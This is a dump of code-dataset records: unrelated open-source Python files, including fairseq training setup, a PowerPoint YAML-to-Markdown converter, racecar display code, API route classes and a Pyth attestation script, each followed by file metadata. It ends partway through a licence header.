# path = self.args.data_name_or_path
src_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(src_dict_name)))
tgt_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(tgt_dict_name)))
assert src_dict.bos() == tgt_dict.bos() == 0
assert src_dict.pad() == tgt_dict.pad() == 1
assert src_dict.eos() == tgt_dict.eos() == 2
assert src_dict.unk() == tgt_dict.unk() == 3
logger.info('[{}] dictionary: {} types'.format('source', len(src_dict)))
logger.info('[{}] dictionary: {} types'.format('target', len(tgt_dict)))
return src_dict, tgt_dict
def main(rank, args, world_size):
if rank == 0:
logger.info(vars(args))
# create task & load source and taget dictionary
# translation_task = TranslationTask.setup_task(args)
logger.info(f"Running DDP on rank {rank}.")
setup(rank, world_size)
# build trainer
logger.info('- build trainer (rank {})...'.format(rank))
trainer = Trainer(args, logger, rank)
src_dict, tgt_dict = trainer.get_dicts()
# create datasets
logger.info('- loading training set (rank {})...'.format(rank))
train_dataset = FairseqDataset(src_dict, args.train_source, args.train_target,
max_positions=args.max_positions, no_bos=args.no_bos)
logger.info('- loading development set (rank {})...'.format(rank))
dev_dataset = FairseqDataset(src_dict, args.dev_source, args.dev_target,
max_positions=args.max_positions, no_bos=False)
torch.distributed.barrier() # make sure all datasets are loaded
def collate_fn(samples):
"""
Args:
samples: list of samples
"""
return collate(samples, train_dataset.pad_idx, train_dataset.eos_idx,
left_pad_source=True,
left_pad_target=False,
input_feeding=True)
train_sampler = DistributedSampler(train_dataset, num_replicas=world_size, rank=rank, shuffle=True)
train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, sampler=train_sampler,
collate_fn=collate_fn, pin_memory=True)
# train model
trainer.train(train_dataloader, train_sampler, dev_dataset, None)
# finish process
cleanup()
if __name__ == "__main__":
parser = init_arg_parser()
# TranslationTask.add_args(parser)
args = parser.parse_args()
# main(args)
n_gpus = torch.cuda.device_count()
mp.spawn(main,
args=(args, n_gpus),
nprocs=n_gpus,
join=True)
| 31.932773
| 103
| 0.669737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 867
| 0.228158
|
b2aa5d4587a6ca679b22dbefb38488aae64a9c0e
| 4,555
|
py
|
Python
|
yaml-to-md.py
|
phlummox/pptx-to-md
|
6bd16c9cdf28946cd0ab9b8766b6eea1410de705
|
[
"Unlicense"
] | 2
|
2022-02-19T11:45:56.000Z
|
2022-03-07T13:34:09.000Z
|
yaml-to-md.py
|
phlummox/pptx-to-md
|
6bd16c9cdf28946cd0ab9b8766b6eea1410de705
|
[
"Unlicense"
] | null | null | null |
yaml-to-md.py
|
phlummox/pptx-to-md
|
6bd16c9cdf28946cd0ab9b8766b6eea1410de705
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
"""
intermediate yaml to markdown conversion
"""
import sys
import yaml
def yaml_to_markdown(yaml, outfile):
"""Given a list of dicts representing PowerPoint slides
-- presumably loaded from a YAML file -- convert to
markdown and print the result on the file-like
object 'outfile'.
"""
for slide in yaml:
slide_to_markdown(slide, outfile)
def get_title(slide):
"""return title or None. Deletes title from dict"""
shapes = slide["conts"]
found = False
for i, shape in enumerate(shapes):
if shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
found = True
title = shape
break
if found:
del shapes[i]
return title["String"].replace("\n", " ")
def slide_to_markdown(slide, outfile):
shapes = slide["conts"]
title = get_title(slide)
if not title:
title = "SLIDE"
print("### " + title + "\n", file=outfile)
for shape in shapes:
if shape["ShapeType"] == "com.sun.star.drawing.GraphicObjectShape":
add_graphic(shape, outfile)
# all Groups should've been converted to SVG
elif shape["ShapeType"] == "com.sun.star.drawing.GroupShape":
print("grouping ...\nslide title: ", title)
add_graphic(shape, outfile)
elif shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
out_str = "(TABLE not converted from PowerPoint)"
print(out_str + "\n", file=outfile)
elif "elements" in shape:
add_list(shape, outfile)
elif "String" in shape and shape["String"]:
add_text(shape, outfile)
else:
out_str = "<!-- sl: %(slideNum)s, shp: %(shapeNum)s, type: %(shapeType)s !-->" % {
"slideNum" : slide["slideNum"],
"shapeNum" : shape["shapeNum"],
"shapeType" : shape["ShapeType"] }
print(out_str + "\n", file=outfile)
def add_text(shape, outfile):
"""
convert a text-like Shape to a string, and
print to 'outfile'
"""
print( shape["String"].strip() + "\n", file=outfile)
def add_list(shape, outfile):
"""
Given a shape that represents an 'Outline' --
OpenOffice's representation of a bulleted or numbered
list -- attempt to convert the elements into
a sensible Markdown list, and write to
"outfile".
"""
els = shape["elements"]
indent = 0
def item_to_str(item):
s = (' ' * indent * 4) + "- " + item["String"].strip()
return s
# handle first item
output = [item_to_str(els[0])]
def dump_output():
print( "\n".join(output) + "\n", file=outfile)
if len(els) == 1:
dump_output()
return
# handle rest of items
last_el = els[0]
for el in els[1:]:
# int-ify the level if None
if el["NumberingLevel"] is None:
el["NumberingLevel"] = 0
if last_el["NumberingLevel"] is None:
last_el["NumberingLevel"] = 0
# new indent
if el["NumberingLevel"] > last_el["NumberingLevel"]:
indent += 1
elif el["NumberingLevel"] < last_el["NumberingLevel"]:
indent = max(0, indent-1)
else:
pass
#print(" new indent:", indent)
if len(el["String"]) > 1:
output.append(item_to_str(el))
last_el = el
dump_output()
def add_graphic(shape, outfile):
"""
Given a Shape representing some graphics object
(e.g. jpg, png, MetaFile, SVG), write out
the markdown to show it on "outfile".
"""
if "String" in shape and shape["String"]:
alt_text = shape["String"]
else:
alt_text = ""
if "exported_svg_filename" in shape:
filename = shape["exported_svg_filename"]
else:
filename = shape["exported_filename"]
link = "s)" % { "alt_text" : alt_text,
"filename" : filename }
print(link + "\n", file=outfile)
# typical image types:
# image/jpeg, image/png, image/gif
# text shapes:
# TextShape, NotesShape, SubtitleShape, OutlinerShape,
# TitleTextShape, ?CustomShape, possibly ?RectangleShape
def convert_file(input_file, output_file):
"""start an soffice server, then convert input file to output file
using image dir."""
with open(input_file, "r") as input:
y = yaml.load(input, Loader=yaml.SafeLoader)
with open(output_file, "w") as output:
yaml_to_markdown(y, output)
MAIN="__main__"
#MAIN=None
def main():
"""main"""
args = sys.argv[1:]
if len(args) != 2:
print("usage: pptx-to-md.py INPUT_FILE OUTPUT_FILE")
sys.exit(1)
input_file, output_file = args
convert_file(input_file, output_file)
if __name__ == MAIN:
main()
| 25.305556
| 88
| 0.630077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,063
| 0.452909
|
b2aacb8c58e5a1abfc8fe218bf0ba965384b2044
| 1,032
|
py
|
Python
|
library/real/display_real.py
|
console-beaver/MIT-Racecar-cbeast
|
f7f9c156e7072da7acc680ae1ad1de344253ae05
|
[
"MIT"
] | null | null | null |
library/real/display_real.py
|
console-beaver/MIT-Racecar-cbeast
|
f7f9c156e7072da7acc680ae1ad1de344253ae05
|
[
"MIT"
] | null | null | null |
library/real/display_real.py
|
console-beaver/MIT-Racecar-cbeast
|
f7f9c156e7072da7acc680ae1ad1de344253ae05
|
[
"MIT"
] | null | null | null |
"""
Copyright Harvey Mudd College
MIT License
Spring 2020
Contains the Display module of the racecar_core library
"""
import cv2 as cv
import os
from nptyping import NDArray
from display import Display
class DisplayReal(Display):
__WINDOW_NAME: str = "RACECAR display window"
__DISPLAY: str = ":1"
def __init__(self):
self.__display_found = (
self.__DISPLAY
in os.popen(
"cd /tmp/.X11-unix && for x in X*; do echo \":${x#X}\"; done "
).read()
)
if self.__display_found:
os.environ["DISPLAY"] = self.__DISPLAY
else:
print(f"Display {self.__DISPLAY} not found.")
def create_window(self) -> None:
if self.__display_found:
cv.namedWindow(self.__WINDOW_NAME)
else:
pass
def show_color_image(self, image: NDArray) -> None:
if self.__display_found:
cv.imshow(self.__WINDOW_NAME, image)
cv.waitKey(1)
else:
pass
| 23.454545
| 78
| 0.587209
| 825
| 0.799419
| 0
| 0
| 0
| 0
| 0
| 0
| 255
| 0.247093
|
b2ad711075be04cba1f9b409149e9a9fc3958436
| 749
|
py
|
Python
|
DominantSparseEigenAD/tests/demos/2ndderivative.py
|
buwantaiji/DominantSparseEigenAD
|
36d534b6713ba256309b07116ebc542bee01cd51
|
[
"Apache-2.0"
] | 23
|
2019-10-29T03:35:18.000Z
|
2022-02-11T16:38:24.000Z
|
DominantSparseEigenAD/tests/demos/2ndderivative.py
|
navyTensor/DominantSparseEigenAD
|
3a5ac361edafd82f98ecf4d9fcad5c4e0b242178
|
[
"Apache-2.0"
] | null | null | null |
DominantSparseEigenAD/tests/demos/2ndderivative.py
|
navyTensor/DominantSparseEigenAD
|
3a5ac361edafd82f98ecf4d9fcad5c4e0b242178
|
[
"Apache-2.0"
] | 6
|
2019-11-06T09:09:45.000Z
|
2022-02-09T06:24:15.000Z
|
"""
A small toy example demonstrating how the process of computing 1st
derivative can be added to the original computation graph to produce an enlarged
graph whose back-propagation yields the 2nd derivative.
"""
import torch
x = torch.randn(10, requires_grad=True)
exp = torch.exp(x)
cos = torch.cos(x)
y = exp * cos
cosbar = exp
expbar = cos
minussin = -torch.sin(x)
grad1 = cosbar * minussin
grad2 = expbar * exp
dydx = grad1 + grad2
d2ydx2 = torch.autograd.grad(dydx, x, grad_outputs=torch.ones(dydx.shape[0]))
print("y: ", y, "\ngroundtruth: ", torch.exp(x) * torch.cos(x))
print("dy/dx: ", dydx, "\ngroundtruth: ", torch.exp(x) * (torch.cos(x)- torch.sin(x)))
print("d2y/dx2: ", d2ydx2, "\ngroundtruth", -2 * torch.exp(x) * torch.sin(x))
| 32.565217
| 86
| 0.695594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.385848
|
b2adb9d7006450ffeda3b214aef1de0a2d913357
| 1,335
|
py
|
Python
|
test_default.py
|
dukedhx/tokenflex-reporting-python-script
|
f837b4e4a1cf388620da94abbaddab6bcabd51a8
|
[
"MIT"
] | 4
|
2018-12-17T09:09:44.000Z
|
2020-12-15T16:35:47.000Z
|
test_default.py
|
dukedhx/tokenflex-reporting-python-script
|
f837b4e4a1cf388620da94abbaddab6bcabd51a8
|
[
"MIT"
] | null | null | null |
test_default.py
|
dukedhx/tokenflex-reporting-python-script
|
f837b4e4a1cf388620da94abbaddab6bcabd51a8
|
[
"MIT"
] | 4
|
2019-09-01T10:08:32.000Z
|
2021-01-09T10:12:46.000Z
|
#####################################################################
## Copyright (c) Autodesk, Inc. All rights reserved
## Written by Forge Partner Development
##
## Permission to use, copy, modify, and distribute this software in
## object code form for any purpose and without fee is hereby granted,
## provided that the above copyright notice appears in all copies and
## that both that copyright notice and the limited warranty and
## restricted rights notice below appear in all supporting
## documentation.
##
## AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
## AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
## MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
## DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
## UNINTERRUPTED OR ERROR FREE.
#####################################################################
import simple_http_server as SimpleHTTPServer
import consumption_reporting as ConsumptionReporting
from threading import Thread
from time import sleep
import pytest
@pytest.mark.skip()
def shutdownServer():
sleep(30)
SimpleHTTPServer.httpd.shutdown()
def testServer():
thread = Thread(target=shutdownServer)
thread.start()
SimpleHTTPServer.startHttpServer()
thread.join()
def testConsumption():
ConsumptionReporting.start(None)
| 32.560976
| 70
| 0.691386
| 0
| 0
| 0
| 0
| 93
| 0.069663
| 0
| 0
| 855
| 0.640449
|
b2ae0f0ae136e69e9eedb942d08d354586e0fafa
| 4,850
|
py
|
Python
|
HyperAPI/hdp_api/routes/nitro.py
|
RomainGeffraye/HyperAPI
|
6bcd831ee48abb3a4f67f85051bc0d2a07c7aaef
|
[
"BSD-3-Clause"
] | null | null | null |
HyperAPI/hdp_api/routes/nitro.py
|
RomainGeffraye/HyperAPI
|
6bcd831ee48abb3a4f67f85051bc0d2a07c7aaef
|
[
"BSD-3-Clause"
] | null | null | null |
HyperAPI/hdp_api/routes/nitro.py
|
RomainGeffraye/HyperAPI
|
6bcd831ee48abb3a4f67f85051bc0d2a07c7aaef
|
[
"BSD-3-Clause"
] | null | null | null |
from HyperAPI.hdp_api.routes import Resource, Route
from HyperAPI.hdp_api.routes.base.version_management import available_since
class Nitro(Resource):
name = "nitro"
class _getForecasts(Route):
name = "getForecasts"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID
}
class _getForecast(Route):
name = "getForecast"
httpMethod = Route.GET
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _insertForecast(Route):
name = "insertForecast"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/add"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID
}
class _updateForecast(Route):
name = "updateForecast"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
@available_since('2.0')
class _updateForecastCoef(Route):
name = "updateForecastCoef"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/updatecoef"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _deleteForecast(Route):
name = "deleteForecast"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/delete"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _getForecastTunes(Route):
name = "getForecastTunes"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _updateForecastTunes(Route):
name = "updateForecastTunes"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/update"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _getForecastTunesAggregateGeo(Route):
name = "getForecastTunesAggregateGeo"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/aggregate/geo"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _getForecastTunesAggregateDepot(Route):
name = "getForecastTunesAggregateDepot"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/aggregate/depot"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _exportForecastTunes(Route):
name = "exportForecastTunes"
httpMethod = Route.GET
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/export"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
@available_since('2.0')
class _exportReport(Route):
name = "exportReport"
httpMethod = Route.GET
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/exportreport"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
| 38.188976
| 113
| 0.640412
| 4,719
| 0.97299
| 0
| 0
| 843
| 0.173814
| 0
| 0
| 1,671
| 0.344536
|
b2b1ab378336c1f38be58369252277dd0f368208
| 4,883
|
py
|
Python
|
third_party/pyth/p2w_autoattest.py
|
dendisuhubdy/wormhole
|
29cd5a3934aaf489a1b7aa45495414c5cb974c82
|
[
"Apache-2.0"
] | 695
|
2020-08-29T22:42:51.000Z
|
2022-03-31T05:33:57.000Z
|
third_party/pyth/p2w_autoattest.py
|
dendisuhubdy/wormhole
|
29cd5a3934aaf489a1b7aa45495414c5cb974c82
|
[
"Apache-2.0"
] | 478
|
2020-08-30T16:48:42.000Z
|
2022-03-30T23:00:11.000Z
|
third_party/pyth/p2w_autoattest.py
|
dendisuhubdy/wormhole
|
29cd5a3934aaf489a1b7aa45495414c5cb974c82
|
[
"Apache-2.0"
] | 230
|
2020-10-19T06:44:13.000Z
|
2022-03-28T11:11:47.000Z
|
#!/usr/bin/env python3
# This script sets up a simple loop for periodical attestation of Pyth data
from pyth_utils import *
from http.client import HTTPConnection
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import os
import re
import subprocess
import time
import threading
P2W_ADDRESS = "P2WH424242424242424242424242424242424242424"
P2W_ATTEST_INTERVAL = float(os.environ.get("P2W_ATTEST_INTERVAL", 5))
P2W_OWNER_KEYPAIR = os.environ.get(
"P2W_OWNER_KEYPAIR", f"/usr/src/solana/keys/p2w_owner.json")
P2W_ATTESTATIONS_PORT = int(os.environ.get("P2W_ATTESTATIONS_PORT", 4343))
PYTH_ACCOUNTS_HOST = "pyth"
PYTH_ACCOUNTS_PORT = 4242
WORMHOLE_ADDRESS = "Bridge1p5gheXUvJ6jGWGeCsgPKgnE3YgdGKRVCMY9o"
ATTESTATIONS = {
"pendingSeqnos": [],
}
class P2WAutoattestStatusEndpoint(BaseHTTPRequestHandler):
"""
A dumb endpoint for last attested price metadata.
"""
def do_GET(self):
print(f"Got path {self.path}")
sys.stdout.flush()
data = json.dumps(ATTESTATIONS).encode("utf-8")
print(f"Sending:\n{data}")
ATTESTATIONS["pendingSeqnos"] = []
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
self.wfile.flush()
def serve_attestations():
"""
Run a barebones HTTP server to share Pyth2wormhole attestation history
"""
server_address = ('', P2W_ATTESTATIONS_PORT)
httpd = HTTPServer(server_address, P2WAutoattestStatusEndpoint)
httpd.serve_forever()
# Get actor pubkeys
P2W_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", P2W_OWNER_KEYPAIR], capture_output=True).stdout.strip()
PYTH_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", PYTH_PROGRAM_KEYPAIR], capture_output=True).stdout.strip()
# Top up pyth2wormhole owner
sol_run_or_die("airdrop", [
str(SOL_AIRDROP_AMT),
"--keypair", P2W_OWNER_KEYPAIR,
"--commitment", "finalized",
], capture_output=True)
# Initialize pyth2wormhole
init_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"init",
"--wh-prog", WORMHOLE_ADDRESS,
"--owner", P2W_OWNER_ADDRESS,
"--pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True, die=False)
if init_result.returncode != 0:
print("NOTE: pyth2wormhole-client init failed, retrying with set_config")
run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"set-config",
"--owner", P2W_OWNER_KEYPAIR,
"--new-owner", P2W_OWNER_ADDRESS,
"--new-wh-prog", WORMHOLE_ADDRESS,
"--new-pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True)
# Retrieve current price/product pubkeys from the pyth publisher
conn = HTTPConnection(PYTH_ACCOUNTS_HOST, PYTH_ACCOUNTS_PORT)
conn.request("GET", "/")
res = conn.getresponse()
pyth_accounts = None
if res.getheader("Content-Type") == "application/json":
pyth_accounts = json.load(res)
else:
print(f"Bad Content type {res.getheader('Content-Type')}", file=sys.stderr)
sys.exit(1)
price_addr = pyth_accounts["price"]
product_addr = pyth_accounts["product"]
nonce = 0
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
print("p2w_autoattest ready to roll.")
print(f"ACCOUNTS: {pyth_accounts}")
print(f"Attest Interval: {P2W_ATTEST_INTERVAL}")
# Serve p2w endpoint
endpoint_thread = threading.Thread(target=serve_attestations, daemon=True)
endpoint_thread.start()
# Let k8s know the service is up
readiness_thread = threading.Thread(target=readiness, daemon=True)
readiness_thread.start()
seqno_regex = re.compile(r"^Sequence number: (\d+)")
nonce = 1
while True:
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
time.sleep(P2W_ATTEST_INTERVAL)
matches = seqno_regex.match(attest_result.stdout)
if matches is not None:
seqno = int(matches.group(1))
print(f"Got seqno {seqno}")
ATTESTATIONS["pendingSeqnos"].append(seqno)
else:
print(f"Warning: Could not get sequence number")
nonce += 1
readiness_thread.join()
| 27.587571
| 87
| 0.683596
| 590
| 0.120827
| 0
| 0
| 0
| 0
| 0
| 0
| 1,684
| 0.34487
|
a22accaa90f9f185eea9b823f9c8bb986540fecb
| 3,644
|
py
|
Python
|
hands-on_introduction/3 - model_validation.py
|
varunpandey0502/skyfi_labs_ml_workshop
|
6a209a16ca3674c1d2cd75e4dcc2e695f50dc583
|
[
"MIT"
] | null | null | null |
hands-on_introduction/3 - model_validation.py
|
varunpandey0502/skyfi_labs_ml_workshop
|
6a209a16ca3674c1d2cd75e4dcc2e695f50dc583
|
[
"MIT"
] | null | null | null |
hands-on_introduction/3 - model_validation.py
|
varunpandey0502/skyfi_labs_ml_workshop
|
6a209a16ca3674c1d2cd75e4dcc2e695f50dc583
|
[
"MIT"
] | null | null | null |
import pandas as pd
melbourne_file_path = './melbourne_housing_data.csv'
melbourne_data = pd.read_csv(melbourne_file_path)
melbourne_data.dropna(axis=0)
y = melbourne_data.Price
melbourne_features = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']
X = melbourne_data[melbourne_features]
X.describe()
X.head(n=10)
from sklearn.tree import DecisionTreeRegressor
melbourne_model = DecisionTreeRegressor(random_state=1)
#Fit model
melbourne_model.fit(X,y)
#Make predictions for first five rows
#print(X.head())
#Predictions
#print(melbourne_model.predict(X.head()))
#What is Model Validation
#You'll want to evaluate almost every model you ever build. In most (though not all) applications, the relevant measure of model quality is predictive accuracy. In other words, will the model's predictions be close to what actually happens.
#
#Many people make a huge mistake when measuring predictive accuracy. They make predictions with their training data and compare those predictions to the target values in the training data. You'll see the problem with this approach and how to solve it in a moment, but let's think about how we'd do this first.
#
#You'd first need to summarize the model quality into an understandable way. If you compare predicted and actual home values for 10,000 houses, you'll likely find mix of good and bad predictions. Looking through a list of 10,000 predicted and actual values would be pointless. We need to summarize this into a single metric.
#
#There are many metrics for summarizing model quality, but we'll start with one called Mean Absolute Error (also called MAE). Let's break down this metric starting with the last word, error.
from sklearn.metrics import mean_absolute_error
predicted_home_prices = melbourne_model.predict(X)
mean_absolute_error(y,predicted_home_prices)
#The Problem with "In-Sample" Scores
#The measure we just computed can be called an "in-sample" score. We used a single "sample" of houses for both building the model and evaluating it. Here's why this is bad.
#
#Imagine that, in the large real estate market, door color is unrelated to home price.
#
#However, in the sample of data you used to build the model, all homes with green doors were very expensive. The model's job is to find patterns that predict home prices, so it will see this pattern, and it will always predict high prices for homes with green doors.
#
#Since this pattern was derived from the training data, the model will appear accurate in the training data.
#
#But if this pattern doesn't hold when the model sees new data, the model would be very inaccurate when used in practice.
#
#Since models' practical value come from making predictions on new data, we measure performance on data that wasn't used to build the model. The most straightforward way to do this is to exclude some data from the model-building process, and then use those to test the model's accuracy on data it hasn't seen before. This data is called validation data.
from sklearn.model_selection import train_test_split
# split data into training and validation data, for both features and target
# The split is based on a random number generator. Supplying a numeric value to
# the random_state argument guarantees we get the same split every time we
# run this script.
train_X,test_X,train_y,test_y = train_test_split(X,y,random_state=0)
#Define the model
melbourne_model = DecisionTreeRegressor()
#Fit the model
melbourne_model.fit(train_X,train_y)
# get predicted prices on validation data
test_predictions = melbourne_model.predict(test_X)
mean_absolute_error(test_y,test_predictions)
| 35.378641
| 353
| 0.791164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,753
| 0.755488
|
a22cbabe9b6d8f3afdad45c7ee147591f90ad7e9
| 3,406
|
py
|
Python
|
src/npu/comprehension.py
|
feagi/feagi
|
598abbe294b5d9cd7ff34861fa6568ba899b2ab8
|
[
"Apache-2.0"
] | 1
|
2022-03-17T08:27:11.000Z
|
2022-03-17T08:27:11.000Z
|
src/npu/comprehension.py
|
feagi/feagi
|
598abbe294b5d9cd7ff34861fa6568ba899b2ab8
|
[
"Apache-2.0"
] | 1
|
2022-02-10T16:30:35.000Z
|
2022-02-10T16:33:21.000Z
|
src/npu/comprehension.py
|
feagi/feagi
|
598abbe294b5d9cd7ff34861fa6568ba899b2ab8
|
[
"Apache-2.0"
] | 1
|
2022-02-07T22:15:54.000Z
|
2022-02-07T22:15:54.000Z
|
# Copyright 2016-2022 The FEAGI Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
def utf_detection_logic(detection_list):
# todo: Add a logic to account for cases were two top ranked items are too close
# Identifies the detected UTF character with highest activity
highest_ranked_item = '-'
second_highest_ranked_item = '-'
for item in detection_list:
if highest_ranked_item == '-':
highest_ranked_item = item
else:
if detection_list[item]['rank'] > detection_list[highest_ranked_item]['rank']:
second_highest_ranked_item = highest_ranked_item
highest_ranked_item = item
elif second_highest_ranked_item == '-':
second_highest_ranked_item = item
else:
if detection_list[item]['rank'] > detection_list[second_highest_ranked_item]['rank']:
second_highest_ranked_item = item
# todo: export detection factor to genome not parameters
detection_tolerance = 1.5
if highest_ranked_item != '-' and second_highest_ranked_item == '-':
print("Highest ranking number was chosen.")
print("1st and 2nd highest ranked numbers are: ", highest_ranked_item, second_highest_ranked_item)
return highest_ranked_item
elif highest_ranked_item != '-' and \
second_highest_ranked_item != '-' and \
detection_list[second_highest_ranked_item]['rank'] != 0:
if detection_list[highest_ranked_item]['rank'] / detection_list[second_highest_ranked_item]['rank'] > \
detection_tolerance:
print("Highest ranking number was chosen.")
print("1st and 2nd highest ranked numbers are: ", highest_ranked_item, second_highest_ranked_item)
return highest_ranked_item
else:
print(">>>> >>> >> >> >> >> > > Tolerance factor was not met!! !! !!")
print("Highest and 2nd highest ranked numbers are: ", highest_ranked_item, second_highest_ranked_item)
return '-'
else:
return '-'
# list_length = len(detection_list)
# if list_length == 1:
# for key in detection_list:
# return key
# elif list_length >= 2 or list_length == 0:
# return '-'
# else:
# temp = []
# counter = 0
# # print(">><<>><<>><<", detection_list)
# for key in detection_list:
# temp[counter] = (key, detection_list[key])
# if temp[0][1] > (3 * temp[1][1]):
# return temp[0][0]
# elif temp[1][1] > (3 * temp[0][1]):
# return temp[1][0]
# else:
# return '-'
# Load copy of all MNIST training images into mnist_data in form of an iterator. Each object has image label + image
| 44.233766
| 120
| 0.620376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,827
| 0.536406
|
a22ccf953739987c462b05149a48bd232390c0be
| 5,286
|
py
|
Python
|
policyhandler/onap/process_info.py
|
alex-sh2020/dcaegen2-platform-policy-handler
|
e969b079e331cc32b1ca361c49ee7b56e43900a7
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2020-07-14T18:54:07.000Z
|
2020-07-14T19:16:06.000Z
|
policyhandler/onap/process_info.py
|
alex-sh2020/dcaegen2-platform-policy-handler
|
e969b079e331cc32b1ca361c49ee7b56e43900a7
|
[
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null |
policyhandler/onap/process_info.py
|
alex-sh2020/dcaegen2-platform-policy-handler
|
e969b079e331cc32b1ca361c49ee7b56e43900a7
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2020-07-14T18:53:46.000Z
|
2021-10-15T16:55:54.000Z
|
# ================================================================================
# Copyright (c) 2018 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
